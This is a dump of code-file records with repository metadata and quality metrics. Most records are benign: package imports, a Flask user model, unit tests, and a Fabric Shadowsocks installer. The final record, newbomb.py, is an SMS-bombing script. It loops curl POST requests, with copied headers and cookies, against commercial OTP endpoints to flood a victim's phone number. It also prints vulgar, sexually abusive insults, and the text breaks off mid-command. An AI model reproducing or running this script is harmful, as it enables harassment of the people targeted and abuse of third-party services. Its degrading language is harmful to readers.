hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0cd3f8ef4188bc3e708721caf09a4b04d214fa3a | 82 | py | Python | src/__init__.py | TNCT-Mechatech/SerialBridgePython | 65fee93efb7ce3b37c21ca473eabf1b00b024fb8 | [
"Apache-2.0"
] | 1 | 2021-06-19T05:59:55.000Z | 2021-06-19T05:59:55.000Z | src/__init__.py | TNCT-Mechatech/SerialBridgePython | 65fee93efb7ce3b37c21ca473eabf1b00b024fb8 | [
"Apache-2.0"
] | 9 | 2021-04-05T07:32:15.000Z | 2021-07-08T01:40:30.000Z | src/__init__.py | TNCT-Mechatech/SerialBridgePython | 65fee93efb7ce3b37c21ca473eabf1b00b024fb8 | [
"Apache-2.0"
] | 1 | 2021-07-08T07:56:36.000Z | 2021-07-08T07:56:36.000Z | #! /usr/bin/env python
from src.message import *
from src.serial_bridge import *
| 16.4 | 31 | 0.743902 | 13 | 82 | 4.615385 | 0.769231 | 0.233333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 82 | 4 | 32 | 20.5 | 0.857143 | 0.256098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0b44d11d6e1217ae37215e2eb381e28c0f05e589 | 1,925 | py | Python | app/modules/auth/models.py | UnoYakshi/DebtCollector | ae101301c0f3e20e24368607c501eca5b319ad98 | [
"MIT"
] | null | null | null | app/modules/auth/models.py | UnoYakshi/DebtCollector | ae101301c0f3e20e24368607c501eca5b319ad98 | [
"MIT"
] | null | null | null | app/modules/auth/models.py | UnoYakshi/DebtCollector | ae101301c0f3e20e24368607c501eca5b319ad98 | [
"MIT"
] | null | null | null | #! ~DebtCollector/app/modules/auth/models.py
#from flask_sqlalchemy import SQLAlchemy
from werkzeug import generate_password_hash, check_password_hash
import json
from datetime import datetime, date
from app import db, bcrypt
class Users(db.Model):
__tablename__ = 'users'
id = db.Column('id', db.Integer, primary_key=True, autoincrement=True)
login = db.Column('login', db.String(32), unique=True, index=True)
first_name = db.Column('first_name', db.String(128))
last_name = db.Column('last_name', db.String(128))
email = db.Column('email', db.String(128), unique=True, index=True)
pwdhash = db.Column('pwdhash', db.String(128), unique=True)
birthdate = db.Column('birthdate', db.Date())
def __init__(self, login, first_name, last_name, email, password, birthdate):
self.login = login
self.first_name = first_name
self.last_name = last_name
self.email = email
self.pwdhash = bcrypt.generate_password_hash(password)
self.birthdate = birthdate
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
def __repr__(self):
return '<User %r>' % (self.login)
def check_password(self, password):
return check_password_hash(self.pwdhash, password)
# TODO :: Make to_json/as_dict automated, but considering datetime and hash...
def to_json(self):
return {
'id': self.id,
'login': self.login,
'first_name': self.first_name,
'last_name': self.last_name,
'email': self.email,
'birthdate': self.birthdate
}
def as_dict(self):
return json.dumps({c.name: (c.name.isoformat()) if (type(c) in (datetime, date)) else (getattr(self, c.name)) for c in self.__table__.columns})
| 32.627119 | 151 | 0.650909 | 255 | 1,925 | 4.721569 | 0.301961 | 0.046512 | 0.036545 | 0.031561 | 0.066445 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009421 | 0.228052 | 1,925 | 58 | 152 | 33.189655 | 0.800808 | 0.082597 | 0 | 0.046512 | 1 | 0 | 0.057289 | 0 | 0 | 0 | 0 | 0.017241 | 0 | 1 | 0.209302 | false | 0.116279 | 0.093023 | 0.186047 | 0.697674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
0b47d70f44921f04a904fb3a7842bcbebca33837 | 657 | py | Python | tests/algorithm_tests.py | SergeyKonnov/walbot | 28923523299bd18b47074915c8209833683d0b8c | [
"MIT"
] | 2 | 2021-01-14T22:17:59.000Z | 2021-12-31T11:18:21.000Z | tests/algorithm_tests.py | SergeyKonnov/walbot | 28923523299bd18b47074915c8209833683d0b8c | [
"MIT"
] | 221 | 2020-01-31T15:04:48.000Z | 2022-01-15T12:03:13.000Z | tests/algorithm_tests.py | aobolensk/walbot | f11ee6971b232cdb177284933528730b70ec67ca | [
"MIT"
] | 1 | 2019-11-26T18:18:46.000Z | 2019-11-26T18:18:46.000Z | from src.algorithms import levenshtein_distance
def test_levenshtein_distance_from_equal_strings():
assert levenshtein_distance("abc", "abc") == 0
def test_levenshtein_distance_difference_1():
assert levenshtein_distance("aac", "abc") == 1
assert levenshtein_distance("abc", "aac") == 1
def test_levenshtein_distance_different_length():
assert levenshtein_distance("ab", "abc") == 1
assert levenshtein_distance("abc", "ab") == 1
assert levenshtein_distance("a", "abc") == 2
assert levenshtein_distance("abc", "a") == 2
def test_levenshtein_distance_swapped_letters():
assert levenshtein_distance("help", "hepl") == 2
| 29.863636 | 52 | 0.730594 | 79 | 657 | 5.746835 | 0.316456 | 0.544053 | 0.440529 | 0.229075 | 0.140969 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0.015929 | 0.14003 | 657 | 21 | 53 | 31.285714 | 0.787611 | 0 | 0 | 0 | 0 | 0 | 0.066971 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 1 | 0.307692 | true | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0b4a11ab18a3d74885fae4e8989f83e0be9328eb | 267 | py | Python | tests/bootstrap_tests.py | reddit/cabot-alert-pagerduty | 459c2bff53d4b947ab14178eae9d6b6c5068a145 | [
"MIT"
] | 1 | 2020-07-31T12:59:34.000Z | 2020-07-31T12:59:34.000Z | tests/bootstrap_tests.py | reddit/cabot-alert-pagerduty | 459c2bff53d4b947ab14178eae9d6b6c5068a145 | [
"MIT"
] | null | null | null | tests/bootstrap_tests.py | reddit/cabot-alert-pagerduty | 459c2bff53d4b947ab14178eae9d6b6c5068a145 | [
"MIT"
] | 4 | 2017-06-02T00:34:38.000Z | 2021-04-08T10:57:21.000Z | # -*- coding: utf-8 -*-
from django.conf import settings
settings.configure()
settings.JENKINS_USER = 'Test'
settings.JENKINS_PASS = 'Test'
settings.GRAPHITE_API = 'Test'
settings.GRAPHITE_USER = 'Test'
settings.GRAPHITE_PASS = 'Test'
settings.GRAPHITE_FROM = 'Test'
| 26.7 | 32 | 0.756554 | 34 | 267 | 5.764706 | 0.441176 | 0.306122 | 0.408163 | 0.244898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004184 | 0.104869 | 267 | 9 | 33 | 29.666667 | 0.8159 | 0.078652 | 0 | 0 | 0 | 0 | 0.098361 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
0b793a3bfbf15bb23c8cabf6ead46fe07580c775 | 92 | py | Python | scrapers/Library/__init__.py | arifer612/MDLPackage | 7f5b3d66fe4dd1eaf0ee7b2f054707af428109a9 | [
"MIT"
] | 1 | 2021-06-15T08:52:01.000Z | 2021-06-15T08:52:01.000Z | scrapers/Library/__init__.py | arifer612/MDLPackage | 7f5b3d66fe4dd1eaf0ee7b2f054707af428109a9 | [
"MIT"
] | 1 | 2022-01-31T06:33:30.000Z | 2022-02-03T09:58:54.000Z | scrapers/Library/__init__.py | arifer612/MDLPackage | 7f5b3d66fe4dd1eaf0ee7b2f054707af428109a9 | [
"MIT"
] | 1 | 2021-08-12T22:35:09.000Z | 2021-08-12T22:35:09.000Z | from . import database
from . import tvTokyo
from . import tvOsaka
from . import YouTubeAPI
| 18.4 | 24 | 0.782609 | 12 | 92 | 6 | 0.5 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 92 | 4 | 25 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0ba03e51c93e1b0bf5831873e619c7ed83295674 | 191 | py | Python | budget/tests/test_budget.py | seanbreckenridge/mint | d19cb5cf28c584f3c3efe322fe154bea243a7eed | [
"MIT"
] | null | null | null | budget/tests/test_budget.py | seanbreckenridge/mint | d19cb5cf28c584f3c3efe322fe154bea243a7eed | [
"MIT"
] | 3 | 2021-03-15T09:48:30.000Z | 2022-02-14T06:02:01.000Z | budget/tests/test_budget.py | seanbreckenridge/mint | d19cb5cf28c584f3c3efe322fe154bea243a7eed | [
"MIT"
] | null | null | null | # just import stuff to make sure nothing is broken
def test_budget() -> None:
import budget.load.balances
import budget.load.transactions
import budget.analyze
assert True
| 19.1 | 50 | 0.727749 | 26 | 191 | 5.307692 | 0.730769 | 0.26087 | 0.231884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21466 | 191 | 9 | 51 | 21.222222 | 0.92 | 0.251309 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | true | 0 | 0.6 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e7e67f85af2fa5fe68fe9e15a41f9020e2759ee8 | 2,157 | py | Python | shadowsocks.py | yingxuanxuan/fabric_script | 7768c038b561ea5cd826edd24c5e2d53bc3a9cd0 | [
"Apache-2.0"
] | 1 | 2016-05-14T04:40:46.000Z | 2016-05-14T04:40:46.000Z | shadowsocks.py | yingxuanxuan/fabric_vultr | 7768c038b561ea5cd826edd24c5e2d53bc3a9cd0 | [
"Apache-2.0"
] | null | null | null | shadowsocks.py | yingxuanxuan/fabric_vultr | 7768c038b561ea5cd826edd24c5e2d53bc3a9cd0 | [
"Apache-2.0"
] | 1 | 2021-06-18T04:10:33.000Z | 2021-06-18T04:10:33.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from fabric.api import reboot, sudo, settings
logging.basicConfig(level=logging.INFO)
def ssserver(port, password, method):
try:
sudo('hash yum')
sudo('hash python')
sudo('yum -y update 1>/dev/null')
sudo('yum -y install python-setuptools 1>/dev/null')
sudo('yum -y install m2crypto 1>/dev/null')
sudo('easy_install pip 1>/dev/null')
sudo('pip install shadowsocks 1>/dev/null')
sudo('hash ssserver')
sudo("sed -i '/ssserver/d' /etc/rc.d/rc.local")
cmd = '/usr/bin/python /usr/bin/ssserver -p %s -k %s -m %s --user nobody -d start' % \
(port, password, method)
sudo("sed -i '$a %s' /etc/rc.d/rc.local" % cmd)
sudo('chmod +x /etc/rc.d/rc.local')
sudo('firewall-cmd --zone=public --add-port=%s/tcp --permanent' % port)
with settings(warn_only=True):
reboot()
sudo('ps -ef | grep ssserver')
return True
except BaseException as e:
logging.error(e)
return False
def sslocal(server_addr, server_port, server_password, method, local_port):
try:
sudo('hash yum')
sudo('hash python')
sudo('yum -y update 1>/dev/null')
sudo('yum -y install python-setuptools 1>/dev/null')
sudo('yum -y install m2crypto 1>/dev/null')
sudo('easy_install pip 1>/dev/null')
sudo('pip install shadowsocks 1>/dev/null')
sudo('hash sslocal')
sudo("sed -i '/sslocal /d' /etc/rc.d/rc.local")
cmd = '/usr/bin/python /usr/bin/sslocal -s %s -p %s -k %s -m %s -b 0.0.0.0 -l %s --user nobody -d start' % \
(server_addr, server_port, server_password, method, local_port)
sudo("sed -i '$a %s' /etc/rc.d/rc.local" % cmd)
sudo('chmod +x /etc/rc.d/rc.local')
sudo('firewall-cmd --zone=public --add-port=%s/tcp --permanent' % local_port)
with settings(warn_only=True):
reboot()
sudo('ps -ef | grep sslocal')
return True
except BaseException as e:
logging.error(e)
return False
| 34.790323 | 116 | 0.578118 | 313 | 2,157 | 3.942492 | 0.255591 | 0.032415 | 0.06483 | 0.097245 | 0.793355 | 0.766613 | 0.756888 | 0.756888 | 0.756888 | 0.677472 | 0 | 0.010712 | 0.264256 | 2,157 | 61 | 117 | 35.360656 | 0.766856 | 0.019471 | 0 | 0.653061 | 0 | 0.040816 | 0.435873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0.081633 | 0.040816 | 0 | 0.163265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
f00da12a4b433dc22423bcc4f137a7f9c47129a6 | 80,788 | py | Python | newbomb.py | Cyber-Hades/sms_streak | 352e829e4dd15e94589465e464d11d189b211d55 | [
"Apache-2.0"
] | 9 | 2021-06-07T17:02:10.000Z | 2021-12-08T07:51:14.000Z | newbomb.py | Cyber-Hades/sms_streak | 352e829e4dd15e94589465e464d11d189b211d55 | [
"Apache-2.0"
] | null | null | null | newbomb.py | Cyber-Hades/sms_streak | 352e829e4dd15e94589465e464d11d189b211d55 | [
"Apache-2.0"
] | null | null | null | import os
import time
class Colours:
white = "\033[1;37m"
grey = "\033[0;37m"
purple = "\033[0;35m"
red = "\033[1;31m"
green = "\033[1;32m"
yellow = "\033[1;33m"
Cyan = "\033[0;36m"
Cafe = "\033[0;33m"
Fiuscha = "\033[0;35m"
blue = "\033[1;34m"
os.system("clear")
print("please rotate your screen to get a fully understandable ASCII")
time.sleep(3)
os.system("clear")
try:
time.sleep(2)
file = open("Banner.txt", "r")
if file.mode == "r":
contents = file.read()
print(Colours.red + contents)
except IOError:
print('Banner File not Found')
print("==================================================================================================")
print("|--------------------------------" + Colours.green + "[" + Colours.yellow + "Powerful Bombing Script" + Colours.green + "]" + Colours.red + "---|-----------------------------------|")
print("|------------------------------------------------------------|----" + Colours.yellow + "Made By" + Colours.red + "----" + Colours.green + "[" + Colours.yellow + "SRIVASTAV JI" + Colours.green + "]" + Colours.red + "--------|")
print("")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Note :" + Colours.yellow + " This tool is only for Educational purpose")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Author :" + Colours.yellow + " SRIVASTAV JI")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Instagram :" + Colours.yellow + " https://instagram.com/srivastav_ji_23")
print(Colours.green + "[" + Colours.Cyan + ">" + Colours.green + "]" + "Github :" + Colours.yellow + " https://github.com/Cyber-Hades/sms_streak")
print(Colours.red + "==================================================================================================")
print("")
print(Colours.green + "[" + Colours.yellow + "1" + Colours.green + "]" + Colours.blue + "LET'S START BOMB")
print(Colours.green + "[" + Colours.yellow + "2" + Colours.green + "]" + Colours.blue + "EXIT")
print()
print(Colours.green + "[" + Colours.yellow + "DATE" + Colours.green + "]" + Colours.yellow )
os.system("date")
print("")
try:
choose = int(input(
Colours.red + "┌─[" + Colours.green + "SRIVASTAV" + Colours.yellow + "@" + Colours.Cyan + "JI" + Colours.red + "]─[" + Colours.green + "SMS-STREAK" + Colours.red + "]\n"
"└──╼" + Colours.yellow + " # " + Colours.green + "Choose an option" + Colours.yellow + " >> " + Colours.green))
if choose == 1:
target = input(Colours.red + "┌─[" + Colours.green + "SRIVASTAV" + Colours.yellow + "@" + Colours.Cyan + "JI" + Colours.red + "]─[" + Colours.green + "SMS-STREAK" + Colours.red + "]\n"
"└──╼" + Colours.yellow + " # " + Colours.green + "Enter a number without code" + Colours.yellow + " >> " + Colours.green)
if target == "9874563210":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Fuck you Daymn Jackass, Dont trynna Bomb my master CYBERMAFIA otherwise u will be fucked by a daymn street dog")
exit()
if target == "7894561230":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Again you did that kind of shit , you fuckin Dickhead , Dont do this again")
time.sleep(3)
exit()
if target == "9564781302":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "What the hell man, Now a street dog comes and licks your mom's pussy")
time.sleep(3)
exit()
if target == "8779456221":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "XD you Bitch You Nigga, now u see how ur mom will feel the heaven in her bed with me")
time.sleep(3)
exit()
if target == "8759461032":
print(Colours.green + "[" + Colours.red + "-" + Colours.green + "] " + Colours.red + "Are you a Whore ?, Dont you see whose number is this you'll gonna be fucked up and i am taking your mom")
time.sleep(3)
exit()
else:
print(Colours.green + "[" + Colours.yellow + "+" +Colours.green + "]" + Colours.yellow + "Bombing started on specified number")
print(Colours.green + "[" + Colours.yellow + "+" +Colours.green + "]" + Colours.yellow + "press ctrl+z to stop then type exit to kill all jobs ")
while True:
os.system('''
curl -X POST -H "Host: www.fbbonline.in" -H "content-length: 435" -H "accept: application/json, text/javascript, */*; q=0.01" -H "x-newrelic-id: VQ8PVlFUChABV1ZRBgYCX1w=" -H "x-requested-with: XMLHttpRequest" -H "user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" -H "content-type: application/x-www-form-urlencoded; charset=UTF-8" -H "origin: https://www.fbbonline.in" -H "sec-fetch-site: same-origin" -H "sec-fetch-mode: cors" -H "sec-fetch-dest: empty" -H "referer: https://www.fbbonline.in/customer/account/checkoutcreate" -H "accept-encoding: gzip, deflate, br" -H "accept-language: en-US,en;q=0.9" -H "cookie: PHPSESSID=l79p1m44qqt2okvragufamej72" -H "cookie: _st_time=1601562961" -H "cookie: _fv=cmpnpp" -H "cookie: _fbp=fb.1.1601562989438.41952253" -H "cookie: activeCategories=s%3A12%3A%2240percentoff%22%3B" -H "cookie: activeFilters=s%3A27%3A%22%7B%22category%22%3A%2240percentoff%22%7D%22%3B" -H "cookie: rrUserId=8b9f6bf18b881409faee14f833956aca" -H "cookie: historyPlpPage=48" -H "cookie: scrollTopPosition=1" -H "cookie: historyProductCount=4"-H "cookie: historyProductSku=BU004TO76DQDINFUR" -H "cookie: historyPosition=1" -H "cookie: BU004TO76DQDINFUR_list=Polos" -H "cookie: pdSapSkus=s%3A155%3A%22%7B%22000001001496399001%22%3A%22XS%22%2C%22000001001496399002%22%3A%22S%22%2C%22000001001496399003%22%3A%22M%22%2C%22000001001496399004%22%3A%22L%22%2C%22000001001496399005%22%3A%22XL%22%2C%22000001001496399006%22%3A%22XXL%22%7D%22%3B" -H "cookie: recently_viewed_Sku=BU004TO76DQDINFUR" -H "cookie: all_store_details=null" -H "cookie: usr_crt=BU004TO76DQDINFUR-112646%3A1" -H "cookie: registration_url_cookie=https%3A%2F%2Fwww.fbbonline.in%2Fcustomer%2Faccount%2FcheckoutLogin" -d 
"YII_CSRF_TOKEN=5c5551174a88bdb2f2c2f2b02a492211701e0e8c&RegistrationForm%5Bsignup_page%5D=1&RegistrationForm%5Bcontact_number%5D='''+target+'''&RegistrationForm%5Bvalid_mobile%5D=1&RegistrationForm%5Bemail%5D=ezioaudi207%40gmail.com&RegistrationForm%5Bvalid_email%5D=1&RegistrationForm%5Bfirst_name%5D=Cyber&RegistrationForm%5Blast_name%5D=Mafia&RegistrationForm%5Bpassword%5D=cybermafia123&RegistrationForm%5Btc_opt_in%5D=on&validate_otp=" 'https://www.fbbonline.in/customer/account/GenerateOtp' > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "x-requested-with:XMLHttpRequest" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "origin:https://www.apollopharmacy.in" -H "sec-fetch-site:same-origin" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:__cfduid=d98851bf93a8b640389d3448001b5a6361601659556" -H "cookie:PHPSESSID=5hi6on4q0uoomj7bhsl9846ce3" -H "cookie:_fbp=fb.1.1601659579198.1711590696" -H "cookie:__ta_device=vwcxwUYWQK6CjLE5qZfOO1jq1sIrSb1f" -H "cookie:__ta_visit=YsIgJNrxlThE7cK9qMyAAGRZdk6tswf7" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:section_data_ids=%7B%22customer%22%3A1601659380%2C%22compare-products%22%3A1601659380%2C%22last-ordered-items%22%3A1601659380%2C%22cart%22%3A1601660577%2C%22directory-data%22%3A1601659380%2C%22cadence-fbpixel-fpc%22%3A1601659380%2C%22review%22%3A1601659380%2C%22ammessages%22%3A1601659380%2C%22wishlist%22%3A1601659380%2C%22paypal-billing-agreement%22%3A1601659380%2C%22messages%22%3A1601660577%7D" -H "cookie:private_content_version=31193f5a756a200e2bcfd8a412d0f435" -H "cookie:AWSALB=ZCK07z5OGSQYuLfAHGqh467T00l+NIScVPXWs5s8f5hjvEoqawwouQiGidnvAY/lGoqzuyhC2+wATC4xbAy3u5VloSD8H7s8+7uXA3ecW3Ml7n49r1h36RUy2IrH" -H "cookie:AWSALBCORS=ZCK07z5OGSQYuLfAHGqh467T00l+NIScVPXWs5s8f5hjvEoqawwouQiGidnvAY/lGoqzuyhC2+wATC4xbAy3u5VloSD8H7s8+7uXA3ecW3Ml7n49r1h36RUy2IrH" -d "mobile='''+target+'''" 
"https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" > /dev/null 2>&1
''')
os.system('''
curl --http2 -X POST -H "Host:grofers.com" -H "content-length:21" -H "app_client:consumer_web" -H "lon:77.040489" -H "device_id:90938812-ddb5-4d18-987b-60793f0776f1" -H "lat:28.4465616" -H "content-type:application/x-www-form-urlencoded" -H "user-agent:Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36" -H "auth_key:ca9d7b061dddb979562082a366c427610f53fe8ef500dadc80f8b0caf7a549fc" -H "accept:*/*" -H "origin:https://grofers.com" -H "sec-fetch-site:same-origin" -H "sec-fetch-mode:cors" -H "sec-fetch-dest:empty" -H "referer:https://grofers.com/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:__cfduid=d475e610ddc76074e6a50d5c6f91118df1601697005" -H "cookie:gr_1_deviceId=90938812-ddb5-4d18-987b-60793f0776f1" -H "cookie:city=" -H "cookie:__cfruid=f91298f1a33a801955b8d5466280379b9d26d7ea-1601697005" -H "cookie:gr_1_lat=28.4640810758775" -H "cookie:gr_1_lon=76.9942133969929" -H "cookie:gr_1_locality=1849" -H "cookie:ajs_anonymous_id=%22a58f3267-aae0-434d-be9c-ecdef450b407%22" -H "cookie:WZRK_S_RKR-99Z-ZK5Z=%7B%22p%22%3A1%7D" -d "user_phone='''+target+'''" "https://grofers.com/v2/accounts/" > /dev/null 2>&1
''')
os.system('''
